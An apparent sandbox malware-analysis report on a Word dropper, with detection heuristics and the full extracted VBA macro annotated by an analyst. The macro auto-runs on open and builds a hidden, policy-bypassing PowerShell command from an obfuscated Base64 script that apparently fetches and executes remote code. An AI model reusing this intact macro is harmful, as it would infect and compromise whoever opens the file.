MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro assembles and executes a shell command; the ClamAV detection name 'Doc.Dropper.Agent-6453829-0' classifies the file as a dropper, so that command most likely downloads and runs a secondary payload. The legacy WordBasic marker and the critical heuristic for a potential Shell call further support this conclusion.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6453829-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6453829-0
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
FR_MC = FR_MC + AQ_OC Shell$ FR_MC End Sub -
AutoOpen macro — low — OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
Attribute VB_Name = "freeform" Sub AutoOpen() Dim FR_MC As String -
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 512714d2c1ff1c9e28381d2ff56478b68d116b8f281837c5aeec9e79aa3df2fc) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5907 bytes |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
' Module header of the document class module as emitted by olevba. No code of
' its own appears in the extract: the next attribute block starts a second
' module.
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Second, standard module ("freeform"), concatenated into the same extract.
' This is the module that holds the AutoOpen routine.
Attribute VB_Name = "freeform"
Sub AutoOpen()
' Auto-executing entry point: Word runs a procedure named AutoOpen when the
' document is opened, so the routine needs no user action beyond macros being
' enabled (this is what the OLE_VBA_AUTOOPEN heuristic keys on).
' There is no Option Explicit in the module: GN_QI and AQ_OC are never
' declared and are implicit Variants; AQ_OC starts Empty, which concatenates
' as an empty string.
Dim FR_MC As String
' Character table. The command string FR_MC is assembled one character at a
' time by indexing into this array (FR_MC = FR_MC + GN_QI(n)), so no
' recognisable keyword ever appears as a literal in the source.
' Following the indices in order, the appends below spell out
'   "powershell -windowstyle hidden -executionpolicy bypass -e "
' (-e / -EncodedCommand takes a Base64-encoded UTF-16LE script; that script
' is AQ_OC, built from the fragments below).
GN_QI = Array("-", "c", "u", "n", "b", "y", "p", "w", "x", "i", "a", "o", "d", "e", "h", " ", "r", "t", "s", "l")
Dim EM_NE As String
' Base64 fragments of the encoded script. Each is declared and assigned in
' between the single-character appends to FR_MC and later joined into AQ_OC
' five at a time; the interleaving is padding meant to hinder reading, not
' logic. The leading "ZgB1AG4AYwB0AGkAbwBu" decodes to UTF-16LE "function";
' the remainder is not decoded here and is where the second-stage logic the
' report summary refers to would be found.
EM_NE = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcgBl"
FR_MC = FR_MC + GN_QI(6)
FR_MC = FR_MC + GN_QI(11)
Dim BQ_SF As String
BQ_SF = "AHQAdQByAG4AIABbAFMAeQBzAH"
FR_MC = FR_MC + GN_QI(7)
FR_MC = FR_MC + GN_QI(13)
Dim FN_RE As String
FN_RE = "QAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBd"
FR_MC = FR_MC + GN_QI(16)
FR_MC = FR_MC + GN_QI(18)
Dim HK_NF As String
HK_NF = "ADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0A"
FR_MC = FR_MC + GN_QI(14)
FR_MC = FR_MC + GN_QI(13)
Dim BS_NC As String
BS_NC = "HIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvA"
' First group of five fragments joined; the same pattern repeats below.
AQ_OC = AQ_OC & EM_NE & BQ_SF & FN_RE & HK_NF & BS_NC
FR_MC = FR_MC + GN_QI(19)
FR_MC = FR_MC + GN_QI(19)
Dim EP_TA As String
EP_TA = "G4AdgBlAHIAdA"
FR_MC = FR_MC + GN_QI(15)
FR_MC = FR_MC + GN_QI(0)
Dim CK_RJ As String
CK_RJ = "BdADoAOgBGAHIAbwBtAEIAYQBz"
FR_MC = FR_MC + GN_QI(7)
FR_MC = FR_MC + GN_QI(9)
Dim BK_OC As String
BK_OC = "AGUANgA0AFMAdAByAGkAbg"
FR_MC = FR_MC + GN_QI(3)
FR_MC = FR_MC + GN_QI(12)
Dim EP_TB As String
EP_TB = "BnACgAJAB4ACkAKQB9AD"
FR_MC = FR_MC + GN_QI(11)
FR_MC = FR_MC + GN_QI(7)
Dim EK_QE As String
EK_QE = "sAaQBlAHgAIAAkACgAYQAgACQAKA"
AQ_OC = AQ_OC & EP_TA & CK_RJ & BK_OC & EP_TB & EK_QE
FR_MC = FR_MC + GN_QI(18)
FR_MC = FR_MC + GN_QI(17)
Dim BL_KE As String
BL_KE = "AkACgAJAAoAGkAb"
FR_MC = FR_MC + GN_QI(5)
FR_MC = FR_MC + GN_QI(19)
Dim BR_MH As String
BR_MH = "gB2AG8AawBlAC0AdwBlAGIAcg"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(15)
Dim IK_QA As String
IK_QA = "BlAHEAdQBlAHMAdAAg"
FR_MC = FR_MC + GN_QI(14)
FR_MC = FR_MC + GN_QI(9)
Dim GK_RJ As String
GK_RJ = "ACcAaAB0AH"
FR_MC = FR_MC + GN_QI(12)
FR_MC = FR_MC + GN_QI(12)
Dim CS_PJ As String
CS_PJ = "QAcABzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAG"
AQ_OC = AQ_OC & BL_KE & BR_MH & IK_QA & GK_RJ & CS_PJ
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(3)
Dim AR_PD As String
AR_PD = "MAZQBuAHQAcgBhAGw"
FR_MC = FR_MC + GN_QI(15)
FR_MC = FR_MC + GN_QI(0)
Dim IQ_OJ As String
IQ_OJ = "ALgB0AGEAYgBsAGUALgBjAG8Acg"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(8)
Dim JO_SJ As String
JO_SJ = "BlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQ"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(1)
Dim DN_LF As String
DN_LF = "BoAG8AdQBzAGUAPwAkAGYAaQBsAHQA"
FR_MC = FR_MC + GN_QI(2)
FR_MC = FR_MC + GN_QI(17)
Dim GL_TI As String
GL_TI = "ZQByAD0AUABhAHIAdABp"
AQ_OC = AQ_OC & AR_PD & IQ_OJ & JO_SJ & DN_LF & GL_TI
FR_MC = FR_MC + GN_QI(9)
FR_MC = FR_MC + GN_QI(11)
Dim BP_OD As String
BP_OD = "AHQAaQBvAG4ASwB"
FR_MC = FR_MC + GN_QI(3)
FR_MC = FR_MC + GN_QI(6)
Dim AM_LF As String
AM_LF = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQA"
FR_MC = FR_MC + GN_QI(11)
FR_MC = FR_MC + GN_QI(19)
Dim DN_NG As String
DN_NG = "lADIANwAmACQAUwBlAGw"
FR_MC = FR_MC + GN_QI(9)
FR_MC = FR_MC + GN_QI(1)
Dim DQ_KJ As String
DQ_KJ = "AZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgAwADEAN"
FR_MC = FR_MC + GN_QI(5)
FR_MC = FR_MC + GN_QI(15)
Dim DR_PG As String
DR_PG = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBz"
AQ_OC = AQ_OC & BP_OD & AM_LF & DN_NG & DQ_KJ & DR_PG
FR_MC = FR_MC + GN_QI(4)
FR_MC = FR_MC + GN_QI(5)
Dim BS_PB As String
BS_PB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AG"
FR_MC = FR_MC + GN_QI(6)
FR_MC = FR_MC + GN_QI(10)
Dim DR_MF As String
DR_MF = "QAbABhAGMAdQBwACYAcwBlA"
FR_MC = FR_MC + GN_QI(18)
FR_MC = FR_MC + GN_QI(18)
Dim HT_LD As String
HT_LD = "D0AMgAwADEANwAtADEAMAAtADAANgBUADIAMg"
FR_MC = FR_MC + GN_QI(15)
FR_MC = FR_MC + GN_QI(0)
Dim EO_RA As String
EO_RA = "A6ADQAMQA6ADEAMgBaACYAcwB0AD0AMgAwADEANwAt"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(15)
Dim CP_RD As String
CP_RD = "ADAAOQAtADIAOABUADEANAA6ADQ"
AQ_OC = AQ_OC & BS_PB & DR_MF & HT_LD & EO_RA & CP_RD
' The command prefix in FR_MC is complete at this point (the last append
' above was the trailing space after "-e"); only Base64 fragments remain.
Dim GL_LD As String
GL_LD = "AMQA6ADEAMg"
Dim GP_OB As String
GP_OB = "BaACYAcwBwAHIAPQBoAHQAdABwAHMAJgBzAGkAZwA9AH"
Dim CK_SI As String
CK_SI = "QAegBQADcAYwA4AHgAWgBoAHIAMQBzAGIAdgB4ADkAZgB"
Dim JM_KA As String
JM_KA = "KAFMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEI"
Dim BT_TB As String
BT_TB = "AbgBsAGwAdQBuAEgAaQBmAEwAM"
AQ_OC = AQ_OC & GL_LD & GP_OB & CK_SI & JM_KA & BT_TB
Dim IQ_RI As String
IQ_RI = "wBoAHgAag"
Dim AL_LC As String
AL_LC = "A0ACUAMwBEACcAIAAtAEgA"
Dim FK_QF As String
FK_QF = "ZQBhAGQAZQByAHMAIABAAHsAJwBBAGMAYwBlAHAAdAAnAD0"
Dim AT_OI As String
AT_OI = "AJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALwBKAFMATwBOA"
Dim FP_SI As String
FP_SI = "CcAfQApAC4AQwBvAG4AdABlAG4AdAAg"
AQ_OC = AQ_OC & IQ_RI & AL_LC & FK_QF & AT_OI & FP_SI
Dim AQ_RH As String
AQ_RH = "AHwAIABDAG8AbgB2AGUAcgB0AE"
AQ_OC = AQ_OC & AQ_RH
Dim BQ_QF As String
BQ_QF = "YAcgBvAG0ALQBKAHMAbwBuACkALgB2AGEAbAB1"
AQ_OC = AQ_OC & BQ_QF
Dim IL_OC As String
' Last fragment; the "=" padding marks the end of the Base64 blob.
IL_OC = "AGUALgBkAGEAdABhACkAKQA="
AQ_OC = AQ_OC & IL_OC
' Join the decoded prefix and the encoded script: FR_MC is now the complete
' command line.
FR_MC = FR_MC + AQ_OC
' Execution via the VBA Shell function (the OLE_VBA_SHELL finding). On an
' endpoint this is the WINWORD.EXE -> powershell.exe process creation a
' detection rule would key on; the hidden-window, execution-policy-bypass
' and encoded-command switches are themselves high-signal indicators.
Shell$ FR_MC
End Sub